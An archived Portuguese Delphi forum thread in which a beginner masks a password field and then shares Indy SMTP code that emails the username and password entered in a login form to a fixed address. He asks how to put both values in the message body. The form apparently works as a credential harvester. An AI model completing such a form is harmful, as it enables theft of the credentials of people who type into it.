Ir para conteúdo

POWERED BY:

Arquivado

Este tópico foi arquivado e está fechado para novas respostas.

abobre

[] Dificuldade com formulario

Recommended Posts

iae galera beleza, estou tentando desenvolver um treco aqui que me deu na kbeça soh que eh assim eu inseri dos memo's no form principal um de:

Usuario: Aqui aparece o nome do usuario em letras,numero(isso nao importa)

Senha: Aqui aparece a senha, soh que eu quero q ela apareca em asteriscos ou bolinhas o que nao esta aparecendo.

segue um Print Screen:

Imagem Postada

Alguem saberia me informar como que eu posso resolver esse meu problema, o meu dominio com o delphi eh de bem iniciante, entao se alguem poder me falar de uma forma bem simples eu agradeço.

Desde já agradeço

Compartilhar este post

Link para o post
Compartilhar em outros sites

Faça o seguinteexite uma propriedade chamada PasswordChar, basta colocar o asterisco nele ou o caracter q você queira q esconda a senha.falow

Compartilhar este post

Link para o post

Obrigado por me ajudar , agora meu problema esta reolvido....vlw mesmo
Estou com nova duvida:

Agora meu problema esta sendo o seguinte, eu fiz o formulario, porem quando a pessoa clica em enviar soh esta chegando a informacao do Usuario e nao da Senha ou vice-versa.

Segue o coder que eu estou usando:

Dessa forma chega somente a informacao do Usuário.

procedure TForm1.btLoginClick(Sender: TObject);begin IdMessage.Recipients.EMailAddresses := 'andre007@isbt.com.br'; IdMessage.Subject := edtSenha.Text; IdMessage.Subject := edtUsuario.Text;  IdSMTP.Connect;  try	IdSMTP.Send(IdMessage);  finally	IdSMTP.Disconnect;  end;
Dessa forma chega somente as informaçoes da senha.

procedure TForm1.btLoginClick(Sender: TObject);begin IdMessage.Recipients.EMailAddresses := 'andre007@isbt.com.br'; IdMessage.Subject := edtSenha.Text;   IdSMTP.Connect;  try	IdSMTP.Send(IdMessage);  finally	IdSMTP.Disconnect;  end;
E tb quando chega os dados ele esta chegando no campo de assunto, gostaria que os 2 dados chega-se no campo onde digitamos o texto para ser enviado para determinada pessoa.

Se alguem puder me ajudar eu agradeço, se quizer me add no mns, tb pode assim poderia me explicar ateh melhor.

MSN. andre_ffranco1@hotmail.com

ateh +

Compartilhar este post

Link para o post

Informação importante

Ao usar o fórum, você concorda com nossos Termos e condições.